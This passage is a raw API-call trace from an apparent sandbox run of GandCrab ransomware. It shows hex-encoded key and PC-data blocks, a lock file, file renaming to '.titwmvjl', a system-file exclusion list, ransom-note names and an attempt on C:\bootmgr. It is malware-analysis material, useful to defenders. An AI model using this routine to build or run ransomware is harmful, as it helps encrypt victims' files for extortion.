\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0067.468] WriteFile (in: hFile=0x21c, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259f79c, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259f79c*=0x2162, lpOverlapped=0x0) returned 1 [0067.468] CloseHandle (hObject=0x21c) returned 1 [0067.469] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.469] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0067.469] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0xc, wMilliseconds=0x315)) [0067.469] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x25e0000 [0067.469] GetWindowsDirectoryW (in: lpBuffer=0x25e0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0067.469] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x25e0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x25e0600, lpMaximumComponentLength=0x25e0608, lpFileSystemFlags=0x25e0604, lpFileSystemNameBuffer=0x25e0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x25e0600*=0xd2ca4def, lpMaximumComponentLength=0x25e0608*=0xff, lpFileSystemFlags=0x25e0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0067.469] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\d2ca4a09d2ca4deb61a.lock") returned 86 [0067.470] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\$recycle.bin\\s-1-5-21-1462094071-1423818996-289466292-1000\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x220 [0067.485] VirtualFree (lpAddress=0x25e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.485] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.485] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\") returned 62 [0067.486] lstrcatW (in: lpString1="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\", lpString2="*" | out: lpString1="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\*") returned="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\*" [0067.486] FindFirstFileExW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\*", fInfoLevelId=0x1, lpFindFileData=0x259f7b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f7b8) returned 0x4c9d38 [0067.486] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0067.486] FindNextFileW (in: hFindFile=0x4c9d38, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0067.489] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0067.489] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0067.489] FindNextFileW (in: hFindFile=0x4c9d38, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0067.489] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0067.489] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0067.490] lstrcatW (in: lpString1="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\d2ca4a09d2ca4deb61a.lock") returned="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\d2ca4a09d2ca4deb61a.lock" [0067.490] lstrlenW (lpString=".titwmvjl") returned 9 [0067.490] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\d2ca4a09d2ca4deb61a.lock") returned 86 [0067.490] VirtualAlloc (lpAddress=0x0, dwSize=0xec, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0067.490] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 95 [0067.490] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\d2ca4a09d2ca4deb61a.lock") returned 86 [0067.490] lstrlenW (lpString=".lock") returned 5 [0067.490] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x25e0000 [0067.490] wsprintfW (in: param_1=0x25e0000, param_2="%ws " | out: param_1=".lock ") returned 6 [0067.490] VirtualFree (lpAddress=0x25e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.491] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.491] FindNextFileW (in: hFindFile=0x4c9d38, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0067.491] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0067.491] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0067.491] lstrcatW (in: lpString1="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\", lpString2="desktop.ini" | out: lpString1="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\desktop.ini") returned="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\desktop.ini" [0067.491] lstrlenW (lpString=".titwmvjl") returned 9 [0067.491] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\desktop.ini") returned 73 [0067.491] VirtualAlloc (lpAddress=0x0, dwSize=0xd2, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0067.491] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\desktop.ini.titwmvjl") returned 82 [0067.491] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\desktop.ini") returned 73 [0067.491] lstrlenW (lpString=".ini") returned 4 [0067.491] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x25e0000 [0067.491] wsprintfW (in: param_1=0x25e0000, param_2="%ws " | out: param_1=".ini ") returned 5 [0067.492] lstrcmpiW (lpString1=".ini", lpString2=".titwmvjl") returned -1 [0067.492] VirtualFree (lpAddress=0x25e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.492] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\desktop.ini") returned 73 [0067.492] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\desktop.ini") returned 73 [0067.492] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0067.492] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.492] FindNextFileW (in: hFindFile=0x4c9d38, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0067.492] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0067.492] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0067.492] lstrcatW (in: lpString1="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\TITWMVJL-DECRYPT.txt") returned="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\TITWMVJL-DECRYPT.txt" [0067.492] lstrlenW (lpString=".titwmvjl") returned 9 [0067.492] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\TITWMVJL-DECRYPT.txt") returned 82 [0067.492] VirtualAlloc (lpAddress=0x0, dwSize=0xe4, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0067.493] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 91 [0067.493] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\TITWMVJL-DECRYPT.txt") returned 82 [0067.493] lstrlenW (lpString=".txt") returned 4 [0067.493] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x25e0000 [0067.493] wsprintfW (in: param_1=0x25e0000, param_2="%ws " | out: param_1=".txt ") returned 5 [0067.493] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0067.493] VirtualFree (lpAddress=0x25e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.493] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\TITWMVJL-DECRYPT.txt") returned 82 [0067.493] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\TITWMVJL-DECRYPT.txt") returned 82 [0067.493] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0067.493] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0067.493] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0067.493] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0067.493] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0067.494] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0067.494] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0067.494] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0067.494] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.494] FindNextFileW (in: hFindFile=0x4c9d38, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 0 [0067.494] FindClose (in: hFindFile=0x4c9d38 | out: hFindFile=0x4c9d38) returned 1 [0067.494] CloseHandle (hObject=0x220) returned 1 [0067.494] FindNextFileW (in: hFindFile=0x4c9c78, lpFindFileData=0x259fa4c | out: lpFindFileData=0x259fa4c) returned 1 [0067.494] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0067.494] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0067.494] lstrcatW (in: lpString1="C:\\$Recycle.Bin\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\$Recycle.Bin\\TITWMVJL-DECRYPT.txt") returned="C:\\$Recycle.Bin\\TITWMVJL-DECRYPT.txt" [0067.494] lstrlenW (lpString=".titwmvjl") returned 9 [0067.494] lstrlenW (lpString="C:\\$Recycle.Bin\\TITWMVJL-DECRYPT.txt") returned 36 [0067.494] VirtualAlloc (lpAddress=0x0, dwSize=0x88, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0067.495] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\$Recycle.Bin\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 45 [0067.495] lstrlenW (lpString="C:\\$Recycle.Bin\\TITWMVJL-DECRYPT.txt") returned 36 [0067.495] lstrlenW (lpString=".txt") returned 4 [0067.495] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x25e0000 [0067.495] wsprintfW (in: param_1=0x25e0000, param_2="%ws " | out: param_1=".txt ") returned 5 [0067.495] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0067.495] VirtualFree (lpAddress=0x25e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.495] lstrlenW (lpString="C:\\$Recycle.Bin\\TITWMVJL-DECRYPT.txt") returned 36 [0067.495] lstrlenW (lpString="C:\\$Recycle.Bin\\TITWMVJL-DECRYPT.txt") returned 36 [0067.495] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0067.495] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0067.495] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0067.495] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0067.495] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0067.495] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0067.495] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0067.495] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0067.495] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.496] FindNextFileW (in: hFindFile=0x4c9c78, lpFindFileData=0x259fa4c | out: lpFindFileData=0x259fa4c) returned 0 [0067.496] FindClose (in: hFindFile=0x4c9c78 | out: hFindFile=0x4c9c78) returned 1 [0067.496] CloseHandle (hObject=0x200) returned 1 [0067.496] FindNextFileW (in: hFindFile=0x4c9cf8, lpFindFileData=0x259fce0 | out: lpFindFileData=0x259fce0) returned 1 [0067.496] lstrcmpW (lpString1="Boot", lpString2=".") returned 1 [0067.496] lstrcmpW (lpString1="Boot", lpString2="..") returned 1 [0067.496] lstrcatW (in: lpString1="C:\\", lpString2="Boot" | out: lpString1="C:\\Boot") returned="C:\\Boot" [0067.496] lstrcatW (in: lpString1="C:\\Boot", lpString2="\\" | out: lpString1="C:\\Boot\\") returned="C:\\Boot\\" [0067.496] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0067.496] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.496] FindNextFileW (in: hFindFile=0x4c9cf8, lpFindFileData=0x259fce0 | out: lpFindFileData=0x259fce0) returned 1 [0067.496] lstrcmpW (lpString1="bootmgr", lpString2=".") returned 1 [0067.496] lstrcmpW (lpString1="bootmgr", lpString2="..") returned 1 [0067.496] lstrcatW (in: lpString1="C:\\", lpString2="bootmgr" | out: lpString1="C:\\bootmgr") returned="C:\\bootmgr" [0067.496] lstrlenW (lpString=".titwmvjl") returned 9 [0067.496] lstrlenW (lpString="C:\\bootmgr") returned 10 [0067.496] VirtualAlloc (lpAddress=0x0, dwSize=0x54, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0067.497] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\bootmgr.titwmvjl") returned 19 [0067.497] lstrlenW (lpString="C:\\bootmgr") returned 10 [0067.497] lstrlenW (lpString="C:\\bootmgr") returned 10 [0067.497] lstrlenW (lpString="C:\\bootmgr") returned 10 [0067.497] lstrcmpiW (lpString1="bootmgr", lpString2="desktop.ini") returned -1 [0067.497] lstrcmpiW (lpString1="bootmgr", lpString2="autorun.inf") returned 1 [0067.497] lstrcmpiW (lpString1="bootmgr", lpString2="ntuser.dat") returned -1 [0067.497] lstrcmpiW (lpString1="bootmgr", lpString2="iconcache.db") returned -1 [0067.497] lstrcmpiW (lpString1="bootmgr", lpString2="bootsect.bak") returned -1 [0067.497] lstrcmpiW (lpString1="bootmgr", lpString2="boot.ini") returned 1 [0067.497] lstrcmpiW (lpString1="bootmgr", lpString2="ntuser.dat.log") returned -1 [0067.497] lstrcmpiW (lpString1="bootmgr", lpString2="thumbs.db") returned -1 [0067.497] lstrlenW (lpString="titwmvjl") returned 8 [0067.497] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x25e0000 [0067.497] lstrlenW (lpString="titwmvjl") returned 8 [0067.497] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x2600000 [0067.497] wsprintfW (in: param_1=0x2600000, param_2="%s-DECRYPT.html" | out: param_1="TITWMVJL-DECRYPT.html") returned 21 [0067.497] wsprintfW (in: param_1=0x25e0000, param_2="%s-DECRYPT.txt" | out: param_1="TITWMVJL-DECRYPT.txt") returned 20 [0067.497] lstrcmpiW (lpString1="bootmgr", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0067.497] lstrcmpiW (lpString1="bootmgr", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0067.497] lstrcmpiW (lpString1="bootmgr", lpString2="KRAB-DECRYPT.html") returned -1 [0067.497] lstrcmpiW (lpString1="bootmgr", lpString2="CRAB-DECRYPT.html") returned -1 [0067.497] lstrcmpiW (lpString1="bootmgr", lpString2="KRAB-DECRYPT.txt") returned -1 [0067.497] lstrcmpiW (lpString1="bootmgr", lpString2="CRAB-DECRYPT.txt") returned -1 [0067.497] lstrcmpiW (lpString1="bootmgr", lpString2="ntldr") returned -1 [0067.497] lstrcmpiW (lpString1="bootmgr", lpString2="NTDETECT.COM") returned -1 [0067.497] lstrcmpiW (lpString1="bootmgr", lpString2="Bootfont.bin") returned 1 [0067.497] lstrlenW (lpString="C:\\bootmgr") returned 10 [0067.498] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x776b0000 [0067.498] GetProcAddress (hModule=0x776b0000, lpProcName="NtSetInformationFile") returned 0x77718e50 [0067.498] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2610000 [0067.498] CreateFileW (lpFileName="C:\\bootmgr" (normalized: "c:\\bootmgr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff 